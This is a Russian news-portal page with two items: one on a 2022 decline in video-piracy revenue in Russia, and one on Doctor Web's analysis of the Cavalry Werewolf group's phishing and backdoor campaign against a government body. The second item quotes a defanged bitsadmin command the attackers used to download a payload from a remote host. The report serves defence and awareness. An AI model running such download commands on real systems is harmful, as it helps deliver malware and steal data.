Пиратский трафик вырос в России на 6%, но потерял в деньгах

Пиратский трафик вырос в России на 6%, но потерял в деньгах

Пиратский трафик вырос в России на 6%, но потерял в деньгах

В 2022 году видеопираты заработали в России $45 млн. Это на 10% меньше, чем годом ранее. При этом заходить к видеоконтрабандистам на контент стали на 6% больше. Чаще всего пиратские фильмы смотрят со смартфонов.

О ежегодном исследовании на тему видеопиратства сообщили в компании F.A.С.С.T. Доходы распространителей нелегального контента продолжают падать пятый год подряд, подтверждает доклад команды аналитиков.

Если в 2019 году объем рынка составлял $63 млн, в 2020 году — $59 млн, в 2021 году — $50 млн, в 2022 году сократился еще на $5 млн до $45 млн.

 

Количество обнаруженных пиратских страниц с русскоязычным видеоконтентом сократилось в 2022 году с 119,4 тысяч до 69 тысяч ресурсов.

Однако это не помешало росту трафика на нелегальные сайты с фильмами. В 2022 году у пиратов стало на 6% больше зрителей.

При этом впервые за многие годы доля мобильного трафика на пиратские ресурсы достигла 60% — нелегальный контент больше смотрят на смартфоне, чем на компьютере.

Хотя в целом трафик на легальные сервисы обогнал “пиратский” — прибавка пользователей официальных онлайн-кинотеатров составила 15%.

По мнению экспертов, сильное влияние на рынок оказали геополитические события.

“Как минимум на трех крупных пиратских CDN-плеерах, которые встроены на 80% всех русскоязычных сайтов с нелегальным видеоконтентом, демонстрировались антироссийские рекламные ролики. Это привело к отказу от работы с ними части пиратов из России, а также к оперативному выявлению и блокировке страниц с подобным содержанием со стороны российских регуляторов”, — говорится в отчете.

Основными источниками доходов онлайн-пиратов по-прежнему остается реклама онлайн-казино и букмекерских контор, но средний показатель CPM (Cost-Per-Mille, цена за 1000 показов в рекламной кампании) на пиратских ресурсах упал на 18%.

Вопреки опасениям индустрии, с уходом западных правообладателей в 2022 не произошло кардинального роста активности пиратских ресурсов, считает директор по развитию бизнеса Digital Risk Protection компании F.A.С.С.T. Станислав Гончаров.

“Мы видим, что существующие инструменты позволяют сократить количество нелегальных источников видеоконтента и ограничить доступ пиратского контента к зрителям”, — заключает эксперт.

Добавим, рост видеопиратства отмечался еще прошлым летом. Тогда отечественные производители жаловались, что на нелегальных сайтах выкладывают и российские новинки, а не только контент ушедших западных коллег. В июле 2022 года “Яндекс” удалил 9 млн ссылок с нелегальными видео. Это на 40% больше, чем год назад.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

Группировка Cavalry Werewolf взломала сеть госоргана с помощью бэкдоров

В июле 2025 года к специалистам компании «Доктор Веб» обратился клиент из госсектора с жалобой на рассылку подозрительных писем с корпоративного почтового ящика. Расследование показало: перед ними была целевая кампания кибергруппировки, которую аналитики идентифицировали как Cavalry Werewolf.

Цель атаки — сбор конфиденциальной информации и картирование сети для дальнейшего закрепления внутри инфраструктуры.

Начали злоумышленники банально, но эффективно — с фишинга. В качестве «приманки» приходили архивы с паролем и вложенным бэкдором BackDoor.ShellNET.1 (основан на открытом проекте Reverse-Shell-CS). Файлы маскировались под служебные записки и другие официальные документы — имена были соответствующие, чтобы снизить бдительность получателя.

 

После запуска BackDoor.ShellNET.1 атакующие использовали стандартный для Windows инструмент bitsadmin для скачивания дополнительных полезных нагрузок (пример: bitsadmin /transfer www /download hxxp://…/winpot.exe). Среди загруженных модулей оказался стилер Trojan.FileSpyNET.5, который массово тянул документы (.doc/.docx/.xlsx/.pdf), текстовые файлы и изображения. Для скрытого доступа применяли BackDoor.Tunnel.41 (вариант ReverseSocks5) — с его помощью создавались SOCKS5-туннели и обеспечивалось скрытое подключение к заражённому ПК.

Дальше — больше: специалисты «Доктор Веб» обнаружили целый набор инструментов, как собственных, так и основанных на open-source. В арсенале группировки — скриптовые загрузчики (например, BAT.DownLoader.1138), «упакованные» трояны (Trojan.Packed2.49708, Trojan.Siggen31.54011 и т. п.), бэкдоры, управляемые через телеграм-ботов (BackDoor.Siggen2.5463, BackDoor.ShellNET.2), а также прокси-модули типа BackDoor.ReverseProxy.1. Некоторые варианты внедряли полезную нагрузку в легитимные процессы — например, инжектировали данные в aspnet_compiler.exe, чтобы бэкдор выполнялся в контексте доверенного приложения.

 

Интересно, что злоумышленники активно пользуются открытими решениями: либо берут код «как есть», либо модифицируют его под свои нужды. Для доставки следующей волны вредоносов они используют стандартные утилиты — PowerShell, bitsadmin, curl — а для сохранения присутствия в системе модифицируют автозагрузку через реестр (HKCU\...\Run) или ставят исполняемые файлы в C:\users\public\pictures и похожие публичные папки.

Атака Cavalry Werewolf показала типичную для целевых кампаний логику: разведка (whoami, ipconfig, просмотр директорий), проверка прокси и сети, затем загрузка инструментов и закрепление. Также злоумышленники могли позже использовать скомпрометированные устройства для перехода в другие сети — например, при смене работы жертвы — и разворачивать дальнейшие атаки через доверенные каналы.

Отдельные особенности группировки, которые отмечают аналитики «Доктор Веб»: предпочтение к open-source-инструментам, частое использование обратных шеллов и SOCKS-туннелей, внедрение вреда в видимо «безобидные» программы и управление через Telegram API. Фишинговые рассылки имитируют сообщения от государственных органов — это снижает подозрительность целевой аудитории и повышает шансы успешной компрометации.

Рекомендации для организаций — стандартный, но действенный набор мер: усилить фильтрацию почты и блокировку подозрительных вложений, ограничить возможность запуска bitsadmin/PowerShell неподписанных скриптов, включить контроль исполнения (application control) и EDR, регулярно проверять целевые публичные папки, применять многофакторную аутентификацию и оперативно реагировать на подозрительные соединения с неизвестными C2-адресами. При обнаружении инцидента — немедленно изолировать пострадавшие хосты и провести полноценную форензику, чтобы выявить степень компрометации.

Расследование «Доктор Веб» — ещё одно напоминание: даже крупные организации с государственным уровнем защиты уязвимы к грамотному фишингу и тому, что за ним следует. В современных целевых атаках именно сочетание человеческой ошибки и хорошо отлаженных инструментов злоумышленников делает наибольший ущерб.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru